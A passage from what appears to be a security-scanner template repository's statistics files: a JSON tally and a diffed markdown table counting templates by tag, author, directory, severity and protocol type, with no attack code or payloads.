webmin","count":1},{"name":"realteo","count":1},{"name":"youtube","count":1},{"name":"avalanche","count":1},{"name":"gurock","count":1},{"name":"sidekiq","count":1},{"name":"avtech","count":1},{"name":"spidercontrol","count":1},{"name":"ecom","count":1},{"name":"luftguitar","count":1},{"name":"graph","count":1},{"name":"sco","count":1},{"name":"pacsone","count":1},{"name":"wondercms","count":1},{"name":"xvr","count":1},{"name":"clickhouse","count":1},{"name":"shoretel","count":1},{"name":"mariadb","count":1},{"name":"mirai","count":1},{"name":"olivetti","count":1},{"name":"mongoshake","count":1},{"name":"place","count":1},{"name":"spectracom","count":1},{"name":"goahead","count":1},{"name":"graphite","count":1},{"name":"plc","count":1},{"name":"phpfusion","count":1},{"name":"matrix","count":1},{"name":"moinmoin","count":1},{"name":"shoppable","count":1},{"name":"circleci","count":1},{"name":"nedi","count":1},{"name":"gilacms","count":1},{"name":"motorola","count":1},{"name":"acexy","count":1},{"name":"square","count":1},{"name":"expressjs","count":1},{"name":"fortiweb","count":1},{"name":"kindeditor","count":1},{"name":"discord","count":1},{"name":"package","count":1},{"name":"tugboat","count":1},{"name":"exacqvision","count":1},{"name":"biometrics","count":1},{"name":"opencast","count":1},{"name":"burp","count":1},{"name":"portainer","count":1},{"name":"livezilla","count":1},{"name":"feifeicms","count":1},{"name":"sourcebans","count":1},{"name":"email","count":1},{"name":"openemr","count":1},{"name":"jaspersoft","count":1},{"name":"appweb","count":1},{"name":"kubeflow","count":1},{"name":"aura","count":1},{"name":"wamp","count":1},{"name":"adb","count":1},{"name":"starttls","count":1},{"name":"smi","count":1},{"name":"glowroot","count":1},{"name":"axiom","count":1},{"name":"linksys","count":1},{"name":"zyxel","count":1},{"name":"visionhub","count":1},{"name":"powercreator","count":1},{"name":"springframework","count":1},{"name":"mrtg","count":1},{"name":"loqate","count":1},{"name":"weglot","count":1},{"name":"postmark","count":1},{"name":"saltapi","count":1},{"name":"argussurveillance","count":1},{"name":"fortigates","count":1},{"name":"elfinder","count":1},{"name":"hadoop","count":1},{"name":"concrete","count":1},{"name":"circle","count":1},{"name":"stem","count":1},{"name":"sar2html","count":1},{"name":"upnp","count":1},{"name":"acme","count":1},{"name":"phpunit","count":1},{"name":"beanstalk","count":1},{"name":"xmlchart","count":1},{"name":"woocomernce","count":1},{"name":"wavlink","count":1},{"name":"nexusdb","count":1},{"name":"pyramid","count":1},{"name":"ipstack","count":1},{"name":"rocketchat","count":1},{"name":"fedora","count":1},{"name":"nuuo","count":1},{"name":"crm","count":1},{"name":"mapbox","count":1},{"name":"arl","count":1},{"name":"api-manager","count":1},{"name":"redhat","count":1},{"name":"redcap","count":1},{"name":"mdb","count":1},{"name":"spf","count":1},{"name":"panasonic","count":1},{"name":"details","count":1},{"name":"database","count":1},{"name":"pmb","count":1},{"name":"actuator","count":1},{"name":"cyberoam","count":1},{"name":"beanshell","count":1},{"name":"pcoip","count":1},{"name":"webmodule-ee","count":1},{"name":"thinkadmin","count":1},{"name":"opensns","count":1},{"name":"kafdrop","count":1},{"name":"tjws","count":1},{"name":"yachtcontrol","count":1},{"name":"xdcms","count":1},{"name":"circontrorl","count":1},{"name":"razor","count":1},{"name":"setup","count":1},{"name":"addpac","count":1},{"name":"eyou","count":1},{"name":"alerta","count":1},{"name":"emby","count":1},{"name":"kyan","count":1},{"name":"geolocation","count":1},{"name":"qsan","count":1},{"name":"cves2001","count":1},{"name":"keenetic","count":1},{"name":"zookeeper","count":1},{"name":"hiawatha","count":1},{"name":"apiman","count":1},{"name":"roads","count":1},{"name":"dotnet","count":1},{"name":"svn","count":1},{"name":"sureline","count":1},{"name":"calendarix","count":1},{"name":"webadmin","count":1},{"name":"netrc","count":1},{"name":"processmaker","count":1},{"name":"influxdb","count":1},{"name":"jmx","count":1},{"name":"cors","count":1},{"name":"visualstudio","count":1},{"name":"streetview","count":1},{"name":"accela","count":1},{"name":"karel","count":1},{"name":"panos","count":1},{"name":"mediumish","count":1},{"name":"anchorcms","count":1},{"name":"wing-ftp","count":1},{"name":"phpinfo","count":1},{"name":"flexbe","count":1},{"name":"scs","count":1},{"name":"selea","count":1},{"name":"ricoh","count":1},{"name":"sqlite","count":1},{"name":"cve2006","count":1},{"name":"b2evolution","count":1},{"name":"nerdgraph","count":1},{"name":"lutron","count":1},{"name":"simplecrm","count":1},{"name":"gridx","count":1},{"name":"jenkin","count":1},{"name":"asus","count":1},{"name":"loganalyzer","count":1},{"name":"servicedesk","count":1},{"name":"xunchi","count":1},{"name":"tamronos","count":1},{"name":"dompdf","count":1},{"name":"pippoint","count":1},{"name":"openweather","count":1},{"name":"jsp","count":1},{"name":"xampp","count":1},{"name":"buttercms","count":1},{"name":"cgi","count":1},{"name":"cerebro","count":1},{"name":"adiscon","count":1},{"name":"viewlinc","count":1},{"name":"majordomo2","count":1},{"name":"flink","count":1},{"name":"elasticsearch","count":1},{"name":"perl","count":1},{"name":"proftpd","count":1},{"name":"nimble","count":1},{"name":"webftp","count":1},{"name":"shopizer","count":1},{"name":"clave","count":1},{"name":"skywalking","count":1},{"name":"messaging","count":1},{"name":"fastapi","count":1},{"name":"lancom","count":1},{"name":"sql","count":1},{"name":"tieline","count":1},{"name":"woocommerce","count":1},{"name":"cscart","count":1},{"name":"floc","count":1},{"name":"interlib","count":1},{"name":"websvn","count":1},{"name":"wildfly","count":1},{"name":"zmanda","count":1},{"name":"shopware","count":1},{"name":"subrion","count":1},{"name":"pulsesecure","count":1},{"name":"syslog","count":1},{"name":"openstack","count":1},{"name":"elevation","count":1},{"name":"vidyo","count":1},{"name":"wooyun","count":1},{"name":"spip","count":1},{"name":"clockwork","count":1},{"name":"remkon","count":1},{"name":"gitea","count":1},{"name":"tapestry","count":1},{"name":"tika","count":1},{"name":"traefik","count":1},{"name":"nweb2fax","count":1},{"name":"digitalocean","count":1},{"name":"imap","count":1},{"name":"idemia","count":1},{"name":"haproxy","count":1},{"name":"ssl","count":1},{"name":"openerp","count":1},{"name":"commscope","count":1},{"name":"omi","count":1},{"name":"phpshowtime","count":1},{"name":"postgres","count":1},{"name":"st","count":1},{"name":"speed","count":1},{"name":"wakatime","count":1},{"name":"gstorage","count":1},{"name":"nuxeo","count":1},{"name":"achecker","count":1},{"name":"sarg","count":1},{"name":"oidc","count":1},{"name":"opentsdb","count":1},{"name":"kerbynet","count":1},{"name":"bedita","count":1},{"name":"cobub","count":1},{"name":"froxlor","count":1},{"name":"rujjie","count":1},{"name":"rmc","count":1},{"name":"optiLink","count":1},{"name":"nearby","count":1},{"name":"dvr","count":1},{"name":"minimouse","count":1},{"name":"mautic","count":1},{"name":"zte","count":1},{"name":"extractor","count":1},{"name":"clockwatch","count":1},{"name":"trilithic","count":1},{"name":"myvuehelp","count":1},{"name":"clink-office","count":1},{"name":"ognl","count":1},{"name":"okta","count":1},{"name":"metabase","count":1},{"name":"graylog","count":1},{"name":"iceflow","count":1},{"name":"blind","count":1},{"name":"qdpm","count":1},{"name":"drone","count":1},{"name":"expose","count":1},{"name":"locations","count":1},{"name":"duomicms","count":1},{"name":"ruckus","count":1},{"name":"placeos","count":1},{"name":"cockpit","count":1},{"name":"metinfo","count":1},{"name":"opm","count":1},{"name":"darkstat","count":1},{"name":"varnish","count":1},{"name":"pivotaltracker","count":1},{"name":"maxsite","count":1},{"name":"zeroshell","count":1},{"name":"tracer","count":1},{"name":"visualtools","count":1},{"name":" default-login","count":1},{"name":"salesforce","count":1},{"name":"plone","count":1},{"name":"deviantart","count":1},{"name":"chevereto","count":1},{"name":"blue-ocean","count":1},{"name":"zarafa","count":1},{"name":"krweb","count":1},{"name":"natemail","count":1},{"name":"timezone","count":1},{"name":"nc2","count":1},{"name":"xml","count":1},{"name":"magicflow","count":1},{"name":"gloo","count":1},{"name":"sage","count":1},{"name":"totaljs","count":1},{"name":"wazuh","count":1},{"name":"plugin","count":1},{"name":"basic-auth","count":1},{"name":"apos","count":1},{"name":"hiboss","count":1},{"name":"cve202","count":1},{"name":"jenzabar","count":1},{"name":"mantis","count":1},{"name":"okiko","count":1},{"name":"javamelody","count":1},{"name":"photo","count":1},{"name":"dnssec","count":1},{"name":"graphql","count":1},{"name":"terraform","count":1},{"name":"ilo4","count":1},{"name":"yealink","count":1},{"name":"episerver","count":1},{"name":"postmessage","count":1},{"name":"novnc","count":1},{"name":"tensorflow","count":1},{"name":"newrelic","count":1},{"name":"fortinet","count":1},{"name":"openx","count":1},{"name":"eyelock","count":1},{"name":"announcekit","count":1},{"name":"gateone","count":1},{"name":"tinypng","count":1},{"name":"szhe","count":1},{"name":"ganglia","count":1},{"name":"bazarr","count":1},{"name":"spring","count":1},{"name":"openrestry","count":1},{"name":"embedthis","count":1},{"name":"codemeter","count":1},{"name":"qvisdvr","count":1},{"name":"xiuno","count":1},{"name":"bingmaps","count":1},{"name":"playable","count":1},{"name":"synnefo","count":1},{"name":"moin","count":1},{"name":"raspap","count":1},{"name":"cloudinary","count":1},{"name":"k8s","count":1},{"name":"find","count":1},{"name":"smartblog","count":1},{"name":"memcached","count":1},{"name":"discourse","count":1},{"name":"huijietong","count":1},{"name":"dotnetnuke","count":1},{"name":"netgenie","count":1},{"name":"zm","count":1},{"name":"calendly","count":1},{"name":"mpsec","count":1},{"name":"solarlog","count":1},{"name":"phpwiki","count":1},{"name":"logontracer","count":1},{"name":"wiki","count":1},{"name":"doh","count":1},{"name":"redis","count":1},{"name":"asana","count":1},{"name":"artica","count":1},{"name":"fuelcms","count":1},{"name":"yzmcms","count":1},{"name":"couchbase","count":1},{"name":"emc","count":1},{"name":"owasp","count":1},{"name":"tenda","count":1},{"name":"svnserve","count":1},{"name":"oneblog","count":1},{"name":"diris","count":1},{"name":"frontpage","count":1},{"name":"weiphp","count":1},{"name":"klog","count":1},{"name":"shiro","count":1},{"name":"cloudron","count":1},{"name":"centreon","count":1},{"name":"plastic","count":1},{"name":"iptime","count":1},{"name":"sonarcloud","count":1},{"name":"tectuus","count":1},{"name":"camunda","count":1},{"name":"meraki","count":1},{"name":"jumpcloud","count":1},{"name":"hubspot","count":1},{"name":"bash","count":1},{"name":"tpshop","count":1},{"name":"circontrol","count":1},{"name":"wmt","count":1},{"name":"listserv","count":1},{"name":"vscode","count":1},{"name":"labtech","count":1},{"name":"chinaunicom","count":1},{"name":"sgp","count":1},{"name":"default","count":1},{"name":"lokalise","count":1},{"name":"shopxo","count":1},{"name":"sangfor","count":1},{"name":"exponentcms","count":1},{"name":"csrf","count":1},{"name":"landray","count":1},{"name":"pgadmin","count":1},{"name":"etouch","count":1},{"name":"node-red-dashboard","count":1},{"name":"sendgrid","count":1},{"name":"viewpoint","count":1},{"name":"redmine","count":1},{"name":"tongda","count":1},{"name":"tileserver","count":1},{"name":"trane","count":1},{"name":"landrayoa","count":1},{"name":"gsoap","count":1},{"name":"pagerduty","count":1},{"name":"buildkite","count":1},{"name":"nette","count":1},{"name":"ewebs","count":1},{"name":"sceditor","count":1},{"name":"gotmls","count":1},{"name":"primetek","count":1},{"name":"mantisbt","count":1},{"name":"vsphere","count":1},{"name":"triconsole","count":1},{"name":"jfrog","count":1},{"name":"uwsgi","count":1},{"name":"ioncube","count":1},{"name":"centos","count":1},{"name":"manager","count":1},{"name":"zend","count":1},{"name":"fcm","count":1},{"name":"fortigate","count":1},{"name":"webui","count":1},{"name":"dom","count":1},{"name":"socomec","count":1},{"name":"mongo","count":1},{"name":"cloudflare","count":1},{"name":"zcms","count":1},{"name":"pendo","count":1},{"name":"vsftpd","count":1},{"name":"azkaban","count":1},{"name":"monitorr","count":1},{"name":"dbeaver","count":1},{"name":"mod-proxy","count":1},{"name":"finereport","count":1},{"name":"ntopng","count":1},{"name":"faraday","count":1},{"name":"servicenow","count":1},{"name":"geutebruck","count":1},{"name":"turbocrm","count":1},{"name":"alertmanager","count":1},{"name":"k8","count":1},{"name":"swagger","count":1},{"name":"csod","count":1},{"name":"bullwark","count":1},{"name":"mysql","count":1},{"name":"octoprint","count":1},{"name":"ambari","count":1},{"name":"zzzcms","count":1},{"name":"daybyday","count":1},{"name":"ssltls","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":280},{"name":"dhiyaneshdk","count":278},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":53},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":9},{"name":"aashiq","count":8},{"name":"zh","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"harshbothra_","count":7},{"name":"meme-lord","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"oppsec","count":7},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"pentest_swissky","count":6},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"divya_mudgal","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"elsfa7110","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"lu4nx","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"johnk3r","count":5},{"name":"xelkomy","count":5},{"name":"joanbono","count":5},{"name":"e_schultze_","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"tess","count":4},{"name":"github.com/its0x08","count":4},{"name":"0w4ys","count":3},{"name":"sullo","count":3},{"name":"fyoorer","count":3},{"name":"f1tz","count":3},{"name":"me9187","count":3},{"name":"z3bd","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"idealphase","count":3},{"name":"johnjhacking","count":3},{"name":"unstabl3","count":3},{"name":"jarijaas","count":3},{"name":"binaryfigments","count":3},{"name":"emenalf","count":3},{"name":"skeltavik","count":3},{"name":"_generic_human_","count":3},{"name":"shine","count":3},{"name":"sushantkamble","count":3},{"name":"shifacyclewala","count":3},{"name":"impramodsargar","count":3},{"name":"mavericknerd","count":3},{"name":"dudez","count":3},{"name":"vsh00t","count":3},{"name":"thomas_from_offensity","count":3},{"name":"manas_harsh","count":2},{"name":"0xsapra","count":2},{"name":"whoever","count":2},{"name":"randomrobbie","count":2},{"name":"afaq","count":2},{"name":"bsysop","count":2},{"name":"amsda","count":2},{"name":"ehsahil","count":2},{"name":"cocxanh","count":2},{"name":"r12w4n","count":2},{"name":"random-robbie","count":2},{"name":"kiblyn11","count":2},{"name":"0xprial","count":2},{"name":"udit_thakkur","count":2},{"name":"0xsmiley","count":2},{"name":"sy3omda","count":2},{"name":"arcc","count":2},{"name":"w4cky_","count":2},{"name":"r3naissance","count":2},{"name":"nkxxkn","count":2},{"name":"koti2","count":2},{"name":"convisoappsec","count":2},{"name":"gal nagli","count":2},{"name":"gevakun","count":2},{"name":"ree4pwn","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xrudra","count":2},{"name":"bernardofsr","count":2},{"name":"hetroublemakr","count":2},{"name":"parth","count":2},{"name":"socketz","count":2},{"name":"vavkamil","count":2},{"name":"huowuzhao","count":2},{"name":"fabaff","count":2},{"name":"alifathi-h1","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"0xelkomy","count":2},{"name":"0xcrypto","count":2},{"name":"hahwul","count":2},{"name":"bp0lr","count":2},{"name":"g4l1t0","count":2},{"name":"lotusdll","count":2},{"name":"x1m_martijn","count":2},{"name":"bing0o","count":2},{"name":"joeldeleep","count":2},{"name":"foulenzer","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"moritz nentwig","count":2},{"name":"mohammedsaneem","count":2},{"name":"davidmckennirey","count":2},{"name":"absshax","count":1},{"name":"andysvints","count":1},{"name":"0xrod","count":1},{"name":"ohlinge","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"52971","count":1},{"name":"0xtavian","count":1},{"name":"alperenkesk","count":1},{"name":"kurohost","count":1},{"name":"defr0ggy","count":1},{"name":"micha3lb3n","count":1},{"name":"its0x08","count":1},{"name":"yavolo","count":1},{"name":"hanlaomo","count":1},{"name":"patralos","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"vzamanillo","count":1},{"name":"lark lab","count":1},{"name":"nvn1729","count":1},{"name":"push4d","count":1},{"name":"wabafet","count":1},{"name":"droberson","count":1},{"name":"furkansenan","count":1},{"name":"orpheus","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"tirtha_mandal","count":1},{"name":"streetofhackerr007","count":1},{"name":"yashanand155","count":1},{"name":"evolutionsec","count":1},{"name":"schniggie","count":1},{"name":"juicypotato1","count":1},{"name":"yashgoti","count":1},{"name":"sec_hawk","count":1},{"name":"zhenwarx","count":1},{"name":"akash.c","count":1},{"name":"affix","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j33n1k4","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"iampritam","count":1},{"name":"0h1in9e","count":1},{"name":"elmahdi","count":1},{"name":"rotemreiss","count":1},{"name":"mesaglio","count":1},{"name":"clarkvoss","count":1},{"name":"_c0wb0y_","count":1},{"name":"thebinitghimire","count":1},{"name":"qlkwej","count":1},{"name":"ahmetpergamum","count":1},{"name":"exploitation","count":1},{"name":"kabirsuda","count":1},{"name":"jteles","count":1},{"name":"shreyapohekar","count":1},{"name":"borna nematzadeh","count":1},{"name":"rojanrijal","count":1},{"name":"remonsec","count":1},{"name":"shelld3v","count":1},{"name":"co0nan","count":1},{"name":"thevillagehacker","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"shifacyclewla","count":1},{"name":"ringo","count":1},{"name":"c3l3si4n","count":1},{"name":"bad5ect0r","count":1},{"name":"s1r1u5_","count":1},{"name":"fopina","count":1},{"name":"0xteles","count":1},{"name":"jrolf","count":1},{"name":"gboddin","count":1},{"name":"luskabol","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"ooooooo_q","count":1},{"name":"soyelmago","count":1},{"name":"berkdusunur","count":1},{"name":"x6263","count":1},{"name":"0ut0fb4nd","count":1},{"name":"pratik khalane","count":1},{"name":"zandros0","count":1},{"name":"b0rn2r00t","count":1},{"name":"whynotke","count":1},{"name":"tim_koopmans","count":1},{"name":"willd96","count":1},{"name":"ldionmarcil","count":1},{"name":"bjhulst","count":1},{"name":"apt-mirror","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"adrianmf","count":1},{"name":"brabbit10","count":1},{"name":"regala_","count":1},{"name":"un-fmunozs","count":1},{"name":"andirrahmani1","count":1},{"name":"naglinagli","count":1},{"name":"noamrathaus","count":1},{"name":"omarkurt","count":1},{"name":"sickwell","count":1},{"name":"nerrorsec","count":1},{"name":"forgedhallpass","count":1},{"name":"intx0x80","count":1},{"name":"akshansh","count":1},{"name":"ilovebinbash","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"d0rkerdevil","count":1},{"name":"smaranchand","count":1},{"name":"manuelbua","count":1},{"name":"toufik airane","count":1},{"name":"rodnt","count":1},{"name":"luci","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"oscarintherocks","count":1},{"name":"kre80r","count":1},{"name":"thezakman","count":1},{"name":"chron0x","count":1},{"name":"@ofjaaah","count":1},{"name":"philippdelteil","count":1},{"name":"xstp","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"makyotox","count":1},{"name":"geraldino2","count":1},{"name":"elder tao","count":1},{"name":"flag007","count":1},{"name":"pudsec","count":1},{"name":"cristi vlad (@cristivlad25)","count":1},{"name":"bolli95","count":1},{"name":"notsoevilweasel","count":1},{"name":"dawid-czarnecki","count":1},{"name":"knassar702","count":1},{"name":"udyz","count":1},{"name":"alex","count":1},{"name":"revblock","count":1},{"name":"sicksec","count":1},{"name":"mah3sec_","count":1},{"name":"hakluke","count":1},{"name":"ipanda","count":1},{"name":"mhdsamx","count":1},{"name":"mass0ma","count":1},{"name":"b0yd","count":1},{"name":"daviey","count":1},{"name":"izn0u","count":1},{"name":"taielab","count":1},{"name":"elouhi","count":1},{"name":"sshell","count":1},{"name":"retr0","count":1},{"name":"alph4byt3","count":1},{"name":"mubassirpatel","count":1},{"name":"th3.d1p4k","count":1},{"name":"raesene","count":1},{"name":"@dwisiswant0","count":1},{"name":"b4uh0lz","count":1},{"name":"0xd0ff9","count":1},{"name":"aresx","count":1},{"name":"kareemse1im","count":1},{"name":"_darrenmartyn","count":1},{"name":"_harleo","count":1},{"name":"ahmed sherif","count":1},{"name":"undefl0w","count":1},{"name":"ajaysenr","count":1},{"name":"nytr0gen","count":1},{"name":"infosecsanyam","count":1},{"name":"deena","count":1},{"name":"pdp","count":1},{"name":"blckraven","count":1},{"name":"cookiehanhoan","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"becivells","count":1},{"name":"jeya seelan","count":1},{"name":"petruknisme","count":1},{"name":"fmunozs","count":1}],"directory":[{"name":"cves","count":832},{"name":"vulnerabilities","count":327},{"name":"exposed-panels","count":269},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":140},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":749},{"name":"high","count":645},{"name":"medium","count":474},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2205},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 7e62861261..a401b344fc 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,925 +1,925 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | -| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | -| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| cve | 828 | daffainfo | 288 | cves | 832 | info | 749 | http | 2205 | +| lfi | 340 | pikpikcu | 280 | vulnerabilities | 327 | high | 645 | file | 50 | +| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 269 | medium | 474 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | +| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 140 | | | | | | rce | 212 | gy741 | 81 | takeovers | 65 | | | | | | tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | -| cve2021 | 155 | zzeitlin | 63 | workflows | 38 | | | | | -| joomla | 128 | 0x_akoko | 50 | network | 32 | | | | | +| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | +| cve2021 | 155 | madrobot | 63 | workflows | 38 | | | | | +| joomla | 128 | 0x_akoko | 53 | network | 32 | | | | | | cve2010 | 109 | gaurang | 42 | iot | 27 | | | | | | cve2019 | 97 | philippedelteil | 29 | miscellaneous | 24 | | | | | | config | 95 | ice3man | 26 | dns | 12 | | | | | | cve2018 | 88 | organiccrap | 24 | fuzzing | 10 | | | | | | apache | 73 | sheikhrishad | 15 | cnvd | 9 | | | | | | takeover | 69 | pr3r00t | 15 | headless | 5 | | | | | -| default-login | 68 | milo2012 | 14 | | | | | | | -| oob | 68 | techbrunchfr | 13 | | | | | | | -| iot | 68 | suman_kar | 12 | | | | | | | -| token | 67 | cyllective | 11 | | | | | | | -| token-spray | 63 | r3dg33k | 11 | | | | | | | -| cve2017 | 51 | wdahlenb | 10 | | | | | | | -| file | 50 | nadino | 10 | | | | | | | -| unauth | 49 | melbadry9 | 10 | | | | | | | +| iot | 68 | milo2012 | 14 | | | | | | | +| default-login | 68 | techbrunchfr | 13 | | | | | | | +| oob | 68 | suman_kar | 12 | | | | | | | +| token | 67 | r3dg33k | 11 | | | | | | | +| token-spray | 63 | cyllective | 11 | | | | | | | +| cve2017 | 51 | righettod | 10 | | | | | | | +| file | 50 | melbadry9 | 10 | | | | | | | +| unauth | 49 | nadino | 10 | | | | | | | | network | 43 | random_robbie | 10 | | | | | | | -| ssrf | 41 | righettod | 10 | | | | | | | +| ssrf | 41 | wdahlenb | 10 | | | | | | | | sqli | 40 | hackergautam | 9 | | | | | | | -| | 38 | aashiq | 8 | | | | | | | +| | 38 | zh | 8 | | | | | | | +| redirect | 37 | iamthefrogy | 8 | | | | | | | | cve2016 | 37 | that_juan_ | 8 | | | | | | | -| redirect | 37 | zh | 8 | | | | | | | -| oracle | 36 | iamthefrogy | 8 | | | | | | | -| logs | 30 | dr_set | 7 | | | | | | | -| google | 30 | emadshanab | 7 | | | | | | | -| jira | 28 | 0x240x23elu | 7 | | | | | | | -| atlassian | 28 | dogasantos | 7 | | | | | | | -| cve2015 | 28 | techryptic (@tech) | 7 | | | | | | | +| oracle | 36 | aashiq | 8 | | | | | | | +| google | 30 | harshbothra_ | 7 | | | | | | | +| logs | 30 | techryptic (@tech) | 7 | | | | | | | +| jira | 29 | oppsec | 7 | | | | | | | +| atlassian | 29 | 0x240x23elu | 7 | | | | | | | +| cve2015 | 29 | dr_set | 7 | | | | | | | +| listing | 27 | emadshanab | 7 | | | | | | | +| cve2014 | 27 | meme-lord | 7 | | | | | | | | cisco | 27 | randomstr1ng | 7 | | | | | | | -| listing | 27 | kophjager007 | 7 | | | | | | | -| cve2014 | 27 | harshbothra_ | 7 | | | | | | | -| generic | 24 | oppsec | 7 | | | | | | | -| misc | 23 | meme-lord | 7 | | | | | | | -| disclosure | 23 | puzzlepeaches | 6 | | | | | | | -| auth-bypass | 23 | logicalhunter | 6 | | | | | | | -| router | 21 | divya_mudgal | 6 | | | | | | | -| misconfig | 20 | pentest_swissky | 6 | | | | | | | -| aem | 19 | caspergn | 6 | | | | | | | -| sap | 18 | __fazal | 6 | | | | | | | -| cve2012 | 18 | ganofins | 5 | | | | | | | -| debug | 18 | rootxharsh | 5 | | | | | | | -| springboot | 18 | lu4nx | 5 | | | | | | | -| php | 16 | xelkomy | 5 | | | | | | | -| cve2011 | 15 | yanyun | 5 | | | | | | | +| generic | 24 | dogasantos | 7 | | | | | | | +| auth-bypass | 23 | kophjager007 | 7 | | | | | | | +| misc | 23 | __fazal | 6 | | | | | | | +| disclosure | 23 | caspergn | 6 | | | | | | | +| misconfig | 21 | puzzlepeaches | 6 | | | | | | | +| router | 21 | pentest_swissky | 6 | | | | | | | +| aem | 19 | logicalhunter | 6 | | | | | | | +| springboot | 18 | divya_mudgal | 6 | | | | | | | +| sap | 18 | yanyun | 5 | | | | | | | +| debug | 18 | iamnoooob | 5 | | | | | | | +| cve2012 | 18 | xelkomy | 5 | | | | | | | +| php | 16 | rootxharsh | 5 | | | | | | | | devops | 15 | johnk3r | 5 | | | | | | | -| weblogic | 14 | iamnoooob | 5 | | | | | | | -| login | 14 | elsfa7110 | 5 | | | | | | | -| struts | 14 | joanbono | 5 | | | | | | | -| cve2009 | 14 | panch0r3d | 5 | | | | | | | -| fuzz | 14 | e_schultze_ | 4 | | | | | | | -| aws | 14 | github.com/its0x08 | 4 | | | | | | | +| cve2011 | 15 | panch0r3d | 5 | | | | | | | +| login | 14 | ganofins | 5 | | | | | | | +| fuzz | 14 | elsfa7110 | 5 | | | | | | | +| weblogic | 14 | joanbono | 5 | | | | | | | +| cve2009 | 14 | lu4nx | 5 | | | | | | | +| struts | 14 | e_schultze_ | 4 | | | | | | | +| aws | 14 | tess | 4 | | | | | | | | deserialization | 13 | incogbyte | 4 | | | | | | | -| zoho | 13 | nodauf | 4 | | | | | | | -| dns | 13 | johnjhacking | 3 | | | | | | | -| android | 13 | fyoorer | 3 | | | | | | | -| adobe | 13 | emenalf | 3 | | | | | | | -| manageengine | 12 | thomas_from_offensity | 3 | | | | | | | -| dlink | 12 | f1tz | 3 | | | | | | | -| wp-theme | 12 | jarijaas | 3 | | | | | | | -| jenkins | 12 | impramodsargar | 3 | | | | | | | -| magento | 11 | yash anand @yashanand155 | 3 | | | | | | | -| cve2013 | 11 | _generic_human_ | 3 | | | | | | | -| intrusive | 10 | binaryfigments | 3 | | | | | | | -| xxe | 10 | tess | 3 | | | | | | | -| dell | 10 | 0w4ys | 3 | | | | | | | -| hp | 10 | unstabl3 | 3 | | | | | | | -| vmware | 9 | dudez | 3 | | | | | | | -| kubernetes | 9 | shine | 3 | | | 